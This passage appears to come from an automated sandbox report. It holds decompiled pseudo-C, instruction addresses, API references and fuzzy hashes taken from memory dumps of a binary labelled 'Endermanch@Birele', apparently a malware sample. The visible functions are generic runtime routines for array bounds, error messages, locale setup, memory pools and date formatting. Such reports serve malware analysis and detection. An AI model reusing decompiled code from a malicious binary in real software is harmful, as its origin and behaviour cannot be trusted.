                                                                                                          							L0040EDDC();
                                                                                                          							E0040FBCC(_v780);
                                                                                                          							_push( &_v784);
                                                                                                          							_t25 = _t96 + 1; // 0x1
                                                                                                          							_push(_v780);
                                                                                                          							L0040EDE4();
                                                                                                          							E0040FBCC(_v780);
                                                                                                          							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                                                          							_t96 = _t96 + 1;
                                                                                                          							_t97 = _t97 + 8;
                                                                                                          							_t85 = _t85 - 1;
                                                                                                          						} while (_t85 != 0);
                                                                                                          					}
                                                                                                          					_t81 = _v788 - 1;
                                                                                                          					if(_t81 >= 0) {
                                                                                                          						_t84 = _t81 + 1;
                                                                                                          						_t60 =  &_v768;
                                                                                                          						_t92 =  &_v260;
                                                                                                          						do {
                                                                                                          							 *_t92 =  *_t60;
                                                                                                          							_t92 = _t92 + 4;
                                                                                                          							_t60 = _t60 + 8;
                                                                                                          							_t84 = _t84 - 1;
                                                                                                          						} while (_t84 != 0);
                                                                                                          						do {
                                                                                                          							goto L12;
                                                                                                          						} while (E0040FC90(_t83, _t98) != 0);
                                                                                                          						goto L15;
                                                                                                          					}
                                                                                                          					L12:
                                                                                                          					_t83 = _v788 - 1;
                                                                                                          					if(E0040FC60(_v788 - 1, _t98) != 0) {
                                                                                                          						_push( &_v792);
                                                                                                          						_push( &_v260);
                                                                                                          						_push(_v780);
                                                                                                          						L0040EDEC();
                                                                                                          						E0040FBCC(_v780);
                                                                                                          						E0040FEE4(_v792);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				L15:
                                                                                                          				_push(_v776);
                                                                                                          				L0040E978();
                                                                                                          				return E0040FBCC(_v776);
                                                                                                          			}






















                                                                                                          0x0040fcf8
                                                                                                          0x0040fd08
                                                                                                          0x0040fd0f
                                                                                                          0x0040fd0f
                                                                                                          0x0040fd1a
                                                                                                          0x0040fd28
                                                                                                          0x0040fd37
                                                                                                          0x0040fd55
                                                                                                          0x0040fd39
                                                                                                          0x0040fd44
                                                                                                          0x0040fd44
                                                                                                          0x0040fd64
                                                                                                          0x0040fd70
                                                                                                          0x0040fd73
                                                                                                          0x0040fd75
                                                                                                          0x0040fd76
                                                                                                          0x0040fd78
                                                                                                          0x0040fd7e
                                                                                                          0x0040fd80
                                                                                                          0x0040fd8f
                                                                                                          0x0040fd90
                                                                                                          0x0040fd9a
                                                                                                          0x0040fd9b
                                                                                                          0x0040fda0
                                                                                                          0x0040fdab
                                                                                                          0x0040fdac
                                                                                                          0x0040fdb6
                                                                                                          0x0040fdb7
                                                                                                          0x0040fdbc
                                                                                                          0x0040fdd7
                                                                                                          0x0040fdd9
                                                                                                          0x0040fdda
                                                                                                          0x0040fddd
                                                                                                          0x0040fddd
                                                                                                          0x0040fd7e
                                                                                                          0x0040fde6
                                                                                                          0x0040fde9
                                                                                                          0x0040fdeb
                                                                                                          0x0040fdec
                                                                                                          0x0040fdf2
                                                                                                          0x0040fdf8
                                                                                                          0x0040fdfa
                                                                                                          0x0040fdfc
                                                                                                          0x0040fdff
                                                                                                          0x0040fe02
                                                                                                          0x0040fe02
                                                                                                          0x0040fe05
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040fe05
                                                                                                          0x0040fe05
                                                                                                          0x0040fe0c
                                                                                                          0x0040fe17
                                                                                                          0x0040fe1f
                                                                                                          0x0040fe26
                                                                                                          0x0040fe2d
                                                                                                          0x0040fe2e
                                                                                                          0x0040fe33
                                                                                                          0x0040fe3e
                                                                                                          0x0040fe3e
                                                                                                          0x0040fe4c
                                                                                                          0x0040fe50
                                                                                                          0x0040fe56
                                                                                                          0x0040fe57
                                                                                                          0x0040fe67

                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040FD9B
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040FDB7
                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040FE2E
                                                                                                          • VariantClear.OLEAUT32(?), ref: 0040FE57
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 920484758-0
                                                                                                          • Opcode ID: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                                                                                          • Instruction ID: 851186b568ac9808b38ef9c1c74bd22fa8a564c7fa8e4d479fb73432e3711f8f
                                                                                                          • Opcode Fuzzy Hash: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                                                                                          • Instruction Fuzzy Hash: B1412E75A002199FCB61DB59C890BC9B3BCAF48304F0041FAE549F7752DA34AF848F58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040CA88(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				char _v273;
                                                                                                          				char _v534;
                                                                                                          				char _v790;
                                                                                                          				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                          				char _v824;
                                                                                                          				intOrPtr _v828;
                                                                                                          				char _v832;
                                                                                                          				intOrPtr _v836;
                                                                                                          				char _v840;
                                                                                                          				intOrPtr _v844;
                                                                                                          				char _v848;
                                                                                                          				char* _v852;
                                                                                                          				char _v856;
                                                                                                          				char _v860;
                                                                                                          				char _v1116;
                                                                                                          				void* __edi;
                                                                                                          				struct HINSTANCE__* _t40;
                                                                                                          				intOrPtr _t51;
                                                                                                          				struct HINSTANCE__* _t53;
                                                                                                          				void* _t69;
                                                                                                          				void* _t73;
                                                                                                          				intOrPtr _t74;
                                                                                                          				intOrPtr _t83;
                                                                                                          				intOrPtr _t86;
                                                                                                          				intOrPtr* _t87;
                                                                                                          				void* _t93;
                                                                                                          
                                                                                                          				_t93 = __fp0;
                                                                                                          				_v8 = __ecx;
                                                                                                          				_t73 = __edx;
                                                                                                          				_t87 = __eax;
                                                                                                          				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                          					_t40 =  *0x419660; // 0x400000
                                                                                                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                          					_v12 = E0040CA7C(_t73);
                                                                                                          				} else {
                                                                                                          					_v12 = _t73 - _v820.AllocationBase;
                                                                                                          				}
                                                                                                          				E00409EF8( &_v273, 0x104, E0040D908(0x5c) + 1);
                                                                                                          				_t74 = 0x40cc08;
                                                                                                          				_t86 = 0x40cc08;
                                                                                                          				_t83 =  *0x408b44; // 0x408b90
                                                                                                          				if(E00403084(_t87, _t83) != 0) {
                                                                                                          					_t74 = E00403E38( *((intOrPtr*)(_t87 + 4)));
                                                                                                          					_t69 = E00409ED0(_t74, 0x40cc08);
                                                                                                          					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                                          						_t86 = 0x40cc0c;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t51 =  *0x4186c8; // 0x4088f4
                                                                                                          				_t16 = _t51 + 4; // 0xffe7
                                                                                                          				_t53 =  *0x419660; // 0x400000
                                                                                                          				LoadStringA(E004048BC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                          				E00402E70( *_t87,  &_v1116);
                                                                                                          				_v860 =  &_v1116;
                                                                                                          				_v856 = 4;
                                                                                                          				_v852 =  &_v273;
                                                                                                          				_v848 = 6;
                                                                                                          				_v844 = _v12;
                                                                                                          				_v840 = 5;
                                                                                                          				_v836 = _t74;
                                                                                                          				_v832 = 6;
                                                                                                          				_v828 = _t86;
                                                                                                          				_v824 = 6;
                                                                                                          				E0040A418(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                                                                          				return E00409ED0(_v8, _t86);
                                                                                                          			}































                                                                                                          0x0040ca88
                                                                                                          0x0040ca94
                                                                                                          0x0040ca97
                                                                                                          0x0040ca99
                                                                                                          0x0040caa5
                                                                                                          0x0040cab4
                                                                                                          0x0040cade
                                                                                                          0x0040cae4
                                                                                                          0x0040caf0
                                                                                                          0x0040caf5
                                                                                                          0x0040cafb
                                                                                                          0x0040cafb
                                                                                                          0x0040cb19
                                                                                                          0x0040cb1e
                                                                                                          0x0040cb23
                                                                                                          0x0040cb2a
                                                                                                          0x0040cb37
                                                                                                          0x0040cb41
                                                                                                          0x0040cb45
                                                                                                          0x0040cb4c
                                                                                                          0x0040cb55
                                                                                                          0x0040cb55
                                                                                                          0x0040cb4c
                                                                                                          0x0040cb66
                                                                                                          0x0040cb6b
                                                                                                          0x0040cb6f
                                                                                                          0x0040cb7a
                                                                                                          0x0040cb87
                                                                                                          0x0040cb92
                                                                                                          0x0040cb98
                                                                                                          0x0040cba5
                                                                                                          0x0040cbab
                                                                                                          0x0040cbb5
                                                                                                          0x0040cbbb
                                                                                                          0x0040cbc2
                                                                                                          0x0040cbc8
                                                                                                          0x0040cbcf
                                                                                                          0x0040cbd5
                                                                                                          0x0040cbf1
                                                                                                          0x0040cc04

                                                                                                          APIs
                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CAA5
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CAC9
                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CAE4
                                                                                                          • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0040CB7A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 3990497365-0
                                                                                                          • Opcode ID: c8cd230da66c324bb7c7ed45a10a2f82c499ce72da6a25a6c281108747935b4f
                                                                                                          • Instruction ID: 2dd30684cf486b67022390aed3356d3c1460ac258ad9161a73c5d8ff110f3458
                                                                                                          • Opcode Fuzzy Hash: c8cd230da66c324bb7c7ed45a10a2f82c499ce72da6a25a6c281108747935b4f
                                                                                                          • Instruction Fuzzy Hash: 8D413170A002589BDB21EB59CC85BDAB7FC9B08304F4441FAE548F7292D7789F848F59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040CA86(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				char _v273;
                                                                                                          				char _v534;
                                                                                                          				char _v790;
                                                                                                          				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                          				char _v824;
                                                                                                          				intOrPtr _v828;
                                                                                                          				char _v832;
                                                                                                          				intOrPtr _v836;
                                                                                                          				char _v840;
                                                                                                          				intOrPtr _v844;
                                                                                                          				char _v848;
                                                                                                          				char* _v852;
                                                                                                          				char _v856;
                                                                                                          				char _v860;
                                                                                                          				char _v1116;
                                                                                                          				void* __edi;
                                                                                                          				struct HINSTANCE__* _t40;
                                                                                                          				intOrPtr _t51;
                                                                                                          				struct HINSTANCE__* _t53;
                                                                                                          				void* _t69;
                                                                                                          				void* _t74;
                                                                                                          				intOrPtr _t75;
                                                                                                          				intOrPtr _t85;
                                                                                                          				intOrPtr _t89;
                                                                                                          				intOrPtr* _t92;
                                                                                                          				void* _t105;
                                                                                                          
                                                                                                          				_v8 = __ecx;
                                                                                                          				_t74 = __edx;
                                                                                                          				_t92 = __eax;
                                                                                                          				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                          					_t40 =  *0x419660; // 0x400000
                                                                                                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                          					_v12 = E0040CA7C(_t74);
                                                                                                          				} else {
                                                                                                          					_v12 = _t74 - _v820.AllocationBase;
                                                                                                          				}
                                                                                                          				E00409EF8( &_v273, 0x104, E0040D908(0x5c) + 1);
                                                                                                          				_t75 = 0x40cc08;
                                                                                                          				_t89 = 0x40cc08;
                                                                                                          				_t85 =  *0x408b44; // 0x408b90
                                                                                                          				if(E00403084(_t92, _t85) != 0) {
                                                                                                          					_t75 = E00403E38( *((intOrPtr*)(_t92 + 4)));
                                                                                                          					_t69 = E00409ED0(_t75, 0x40cc08);
                                                                                                          					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                                          						_t89 = 0x40cc0c;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t51 =  *0x4186c8; // 0x4088f4
                                                                                                          				_t16 = _t51 + 4; // 0xffe7
                                                                                                          				_t53 =  *0x419660; // 0x400000
                                                                                                          				LoadStringA(E004048BC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                          				E00402E70( *_t92,  &_v1116);
                                                                                                          				_v860 =  &_v1116;
                                                                                                          				_v856 = 4;
                                                                                                          				_v852 =  &_v273;
                                                                                                          				_v848 = 6;
                                                                                                          				_v844 = _v12;
                                                                                                          				_v840 = 5;
                                                                                                          				_v836 = _t75;
                                                                                                          				_v832 = 6;
                                                                                                          				_v828 = _t89;
                                                                                                          				_v824 = 6;
                                                                                                          				E0040A418(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                                                                          				return E00409ED0(_v8, _t89);
                                                                                                          			}































                                                                                                          0x0040ca94
                                                                                                          0x0040ca97
                                                                                                          0x0040ca99
                                                                                                          0x0040caa5
                                                                                                          0x0040cab4
                                                                                                          0x0040cade
                                                                                                          0x0040cae4
                                                                                                          0x0040caf0
                                                                                                          0x0040caf5
                                                                                                          0x0040cafb
                                                                                                          0x0040cafb
                                                                                                          0x0040cb19
                                                                                                          0x0040cb1e
                                                                                                          0x0040cb23
                                                                                                          0x0040cb2a
                                                                                                          0x0040cb37
                                                                                                          0x0040cb41
                                                                                                          0x0040cb45
                                                                                                          0x0040cb4c
                                                                                                          0x0040cb55
                                                                                                          0x0040cb55
                                                                                                          0x0040cb4c
                                                                                                          0x0040cb66
                                                                                                          0x0040cb6b
                                                                                                          0x0040cb6f
                                                                                                          0x0040cb7a
                                                                                                          0x0040cb87
                                                                                                          0x0040cb92
                                                                                                          0x0040cb98
                                                                                                          0x0040cba5
                                                                                                          0x0040cbab
                                                                                                          0x0040cbb5
                                                                                                          0x0040cbbb
                                                                                                          0x0040cbc2
                                                                                                          0x0040cbc8
                                                                                                          0x0040cbcf
                                                                                                          0x0040cbd5
                                                                                                          0x0040cbf1
                                                                                                          0x0040cc04

                                                                                                          APIs
                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CAA5
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CAC9
                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CAE4
                                                                                                          • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0040CB7A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 3990497365-0
                                                                                                          • Opcode ID: ecd71696615d48421c94cf751f245bc04475beec22f887684d54506e64bddcf7
                                                                                                          • Instruction ID: 090159ec49ad22dc376a56598d50e76a4c12ce7ebe7e1118fc34256ebd776d61
                                                                                                          • Opcode Fuzzy Hash: ecd71696615d48421c94cf751f245bc04475beec22f887684d54506e64bddcf7
                                                                                                          • Instruction Fuzzy Hash: F1413070A002589BDB21EB59CC85BDAB7FC9B08304F4441FAA548F7292D7789F849F59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040DA5C() {
                                                                                                          				char _v152;
                                                                                                          				short _v410;
                                                                                                          				signed short _t14;
                                                                                                          				signed int _t16;
                                                                                                          				int _t18;
                                                                                                          				void* _t20;
                                                                                                          				void* _t23;
                                                                                                          				int _t24;
                                                                                                          				int _t26;
                                                                                                          				signed int _t30;
                                                                                                          				signed int _t31;
                                                                                                          				signed int _t32;
                                                                                                          				signed int _t37;
                                                                                                          				int* _t39;
                                                                                                          				short* _t41;
                                                                                                          				void* _t49;
                                                                                                          
                                                                                                          				 *0x4199c8 = 0x409;
                                                                                                          				 *0x4199cc = 9;
                                                                                                          				 *0x4199d0 = 1;
                                                                                                          				_t14 = GetThreadLocale();
                                                                                                          				if(_t14 != 0) {
                                                                                                          					 *0x4199c8 = _t14;
                                                                                                          				}
                                                                                                          				if(_t14 != 0) {
                                                                                                          					 *0x4199cc = _t14 & 0x3ff;
                                                                                                          					 *0x4199d0 = (_t14 & 0x0000ffff) >> 0xa;
                                                                                                          				}
                                                                                                          				memcpy(0x418250, 0x40dbb0, 8 << 2);
                                                                                                          				if( *0x418208 != 2) {
                                                                                                          					_t16 = GetSystemMetrics(0x4a);
                                                                                                          					__eflags = _t16;
                                                                                                          					 *0x4199d5 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                                                          					_t18 = GetSystemMetrics(0x2a);
                                                                                                          					__eflags = _t18;
                                                                                                          					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                                                          					 *0x4199d4 = _t31;
                                                                                                          					__eflags = _t31;
                                                                                                          					if(__eflags != 0) {
                                                                                                          						return E0040D9E4(__eflags, _t49);
                                                                                                          					}
                                                                                                          				} else {
                                                                                                          					_t20 = E0040DA44();
                                                                                                          					if(_t20 != 0) {
                                                                                                          						 *0x4199d5 = 0;
                                                                                                          						 *0x4199d4 = 0;
                                                                                                          						return _t20;
                                                                                                          					}
                                                                                                          					E0040D9E4(__eflags, _t49);
                                                                                                          					_t37 = 0x20;
                                                                                                          					_t23 = E00402A00(0x418250, 0x20, 0x40dbb0);
                                                                                                          					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                                                          					 *0x4199d4 = _t32;
                                                                                                          					__eflags = _t32;
                                                                                                          					if(_t32 != 0) {
                                                                                                          						 *0x4199d5 = 0;
                                                                                                          						return _t23;
                                                                                                          					}
                                                                                                          					_t24 = 0x80;
                                                                                                          					_t39 =  &_v152;
                                                                                                          					do {
                                                                                                          						 *_t39 = _t24;
                                                                                                          						_t24 = _t24 + 1;
                                                                                                          						_t39 =  &(_t39[0]);
                                                                                                          						__eflags = _t24 - 0x100;
                                                                                                          					} while (_t24 != 0x100);
                                                                                                          					_t26 =  *0x4199c8; // 0x409
                                                                                                          					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                                                          					_t18 = 0x80;
                                                                                                          					_t41 =  &_v410;
                                                                                                          					while(1) {
                                                                                                          						__eflags =  *_t41 - 2;
                                                                                                          						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                                                          						 *0x4199d5 = _t37;
                                                                                                          						__eflags = _t37;
                                                                                                          						if(_t37 != 0) {
                                                                                                          							goto L17;
                                                                                                          						}
                                                                                                          						_t41 = _t41 + 2;
                                                                                                          						_t18 = _t18 - 1;
                                                                                                          						__eflags = _t18;
                                                                                                          						if(_t18 != 0) {
                                                                                                          							continue;
                                                                                                          						} else {
                                                                                                          							return _t18;
                                                                                                          						}
                                                                                                          						L18:
                                                                                                          					}
                                                                                                          				}
                                                                                                          				L17:
                                                                                                          				return _t18;
                                                                                                          				goto L18;
                                                                                                          			}



















                                                                                                          0x0040da68
                                                                                                          0x0040da72
                                                                                                          0x0040da7c
                                                                                                          0x0040da86
                                                                                                          0x0040da8d
                                                                                                          0x0040da8f
                                                                                                          0x0040da8f
                                                                                                          0x0040da97
                                                                                                          0x0040daa3
                                                                                                          0x0040daaf
                                                                                                          0x0040daaf
                                                                                                          0x0040dac3
                                                                                                          0x0040dacc
                                                                                                          0x0040db7b
                                                                                                          0x0040db80
                                                                                                          0x0040db85
                                                                                                          0x0040db8c
                                                                                                          0x0040db91
                                                                                                          0x0040db93
                                                                                                          0x0040db96
                                                                                                          0x0040db9c
                                                                                                          0x0040db9e
                                                                                                          0x00000000
                                                                                                          0x0040dba6
                                                                                                          0x0040dad2
                                                                                                          0x0040dad2
                                                                                                          0x0040dad9
                                                                                                          0x0040dadb
                                                                                                          0x0040dae2
                                                                                                          0x00000000
                                                                                                          0x0040dae2
                                                                                                          0x0040daef
                                                                                                          0x0040daff
                                                                                                          0x0040db01
                                                                                                          0x0040db06
                                                                                                          0x0040db09
                                                                                                          0x0040db0f
                                                                                                          0x0040db11
                                                                                                          0x0040db13
                                                                                                          0x00000000
                                                                                                          0x0040db13
                                                                                                          0x0040db1f
                                                                                                          0x0040db24
                                                                                                          0x0040db2a
                                                                                                          0x0040db2a
                                                                                                          0x0040db2c
                                                                                                          0x0040db2d
                                                                                                          0x0040db2e
                                                                                                          0x0040db2e
                                                                                                          0x0040db4a
                                                                                                          0x0040db50
                                                                                                          0x0040db55
                                                                                                          0x0040db5a
                                                                                                          0x0040db60
                                                                                                          0x0040db60
                                                                                                          0x0040db64
                                                                                                          0x0040db67
                                                                                                          0x0040db6d
                                                                                                          0x0040db6f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040db71
                                                                                                          0x0040db74
                                                                                                          0x0040db74
                                                                                                          0x0040db75
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040db75
                                                                                                          0x0040db60
                                                                                                          0x0040dbad
                                                                                                          0x0040dbad
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040DB50
                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040DA86
                                                                                                            • Part of subcall function 0040D9E4: GetCPInfo.KERNEL32(00000000,?), ref: 0040D9FD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocaleStringThreadType
                                                                                                          • String ID:
                                                                                                          • API String ID: 1505017576-0
                                                                                                          • Opcode ID: b4970e404707356a13d24a7b8a088547f9a129f1164e4a98242b4227c3be5c94
                                                                                                          • Instruction ID: eae8cb680bebf2e8bf797c74bef7fb2c71b8613e6afdde9c561ff51ee23c3617
                                                                                                          • Opcode Fuzzy Hash: b4970e404707356a13d24a7b8a088547f9a129f1164e4a98242b4227c3be5c94
                                                                                                          • Instruction Fuzzy Hash: DD3126B1E552418AD710A7A6AC517E337E4AB41314F0880BFE584AB3D2EA7C4C49C76E
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E004012EC() {
                                                                                                          				intOrPtr* _t4;
                                                                                                          				intOrPtr _t6;
                                                                                                          				intOrPtr* _t9;
                                                                                                          				intOrPtr* _t12;
                                                                                                          				void* _t14;
                                                                                                          
                                                                                                          				if( *0x4195e0 != 0) {
                                                                                                          					L5:
                                                                                                          					_t4 =  *0x4195e0;
                                                                                                          					 *0x4195e0 =  *_t4;
                                                                                                          					return _t4;
                                                                                                          				} else {
                                                                                                          					_t12 = LocalAlloc(0, 0x644);
                                                                                                          					if(_t12 != 0) {
                                                                                                          						_t6 =  *0x4195dc; // 0x612428
                                                                                                          						 *_t12 = _t6;
                                                                                                          						 *0x4195dc = _t12;
                                                                                                          						_t14 = 0;
                                                                                                          						do {
                                                                                                          							_t2 = (_t14 + _t14) * 8; // 0x4
                                                                                                          							_t9 = _t12 + _t2 + 4;
                                                                                                          							 *_t9 =  *0x4195e0;
                                                                                                          							 *0x4195e0 = _t9;
                                                                                                          							_t14 = _t14 + 1;
                                                                                                          						} while (_t14 != 0x64);
                                                                                                          						goto L5;
                                                                                                          					} else {
                                                                                                          						return 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}








                                                                                                          0x004012f6
                                                                                                          0x00401332
                                                                                                          0x00401332
                                                                                                          0x00401336
                                                                                                          0x0040133a
                                                                                                          0x004012f8
                                                                                                          0x00401304
                                                                                                          0x00401308
                                                                                                          0x0040130f
                                                                                                          0x00401314
                                                                                                          0x00401316
                                                                                                          0x0040131c
                                                                                                          0x0040131e
                                                                                                          0x00401322
                                                                                                          0x00401322
                                                                                                          0x00401328
                                                                                                          0x0040132a
                                                                                                          0x0040132c
                                                                                                          0x0040132d
                                                                                                          0x00000000
                                                                                                          0x0040130a
                                                                                                          0x0040130e
                                                                                                          0x0040130e
                                                                                                          0x00401308

                                                                                                          APIs
                                                                                                          • LocalAlloc.KERNEL32(00000000,00000644,?,L*a,0040134F,?,?,004013EE,?,?,?,00000000,00004003,0040192F), ref: 004012FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocLocal
                                                                                                          • String ID: ($a$,*a$L*a
                                                                                                          • API String ID: 3494564517-775716849
                                                                                                          • Opcode ID: 6d4107bb9de44e2e435fdebb758e93b741ab8b8fcec454dcc6f55fe7b74c7d0d
                                                                                                          • Instruction ID: 803d661eb34c241a9c0abbaa1cb019ef2c2d3bd750285f357371358ae98416de
                                                                                                          • Opcode Fuzzy Hash: 6d4107bb9de44e2e435fdebb758e93b741ab8b8fcec454dcc6f55fe7b74c7d0d
                                                                                                          • Instruction Fuzzy Hash: 22F082767012018FEB25CF69D890696B3E6EB99315F24C07FD584E7760D7368C418B48
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 72%
                                                                                                          			E0040B2EC(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                                                          				char _v8;
                                                                                                          				short _v18;
                                                                                                          				short _v22;
                                                                                                          				struct _SYSTEMTIME _v24;
                                                                                                          				char _v280;
                                                                                                          				char* _t32;
                                                                                                          				intOrPtr* _t49;
                                                                                                          				intOrPtr _t58;
                                                                                                          				void* _t63;
                                                                                                          				void* _t67;
                                                                                                          
                                                                                                          				_v8 = 0;
                                                                                                          				_t49 = __edx;
                                                                                                          				_t63 = __eax;
                                                                                                          				_push(_t67);
                                                                                                          				_push(0x40b3ca);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t67 + 0xfffffeec;
                                                                                                          				E004039AC(__edx);
                                                                                                          				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                                                                                          				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                                                                                          				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                                                                                          				if(_t63 > 2) {
                                                                                                          					E00403A44( &_v8, 0x40b3ec);
                                                                                                          				} else {
                                                                                                          					E00403A44( &_v8, 0x40b3e0);
                                                                                                          				}
                                                                                                          				_t32 = E00403E38(_v8);
                                                                                                          				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                                                                                          					E00403C1C(_t49, 0x100,  &_v280);
                                                                                                          					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                                                                                          						E00403E98( *_t49, E00403C48( *_t49) - 1, 2, _t49);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_pop(_t58);
                                                                                                          				 *[fs:eax] = _t58;
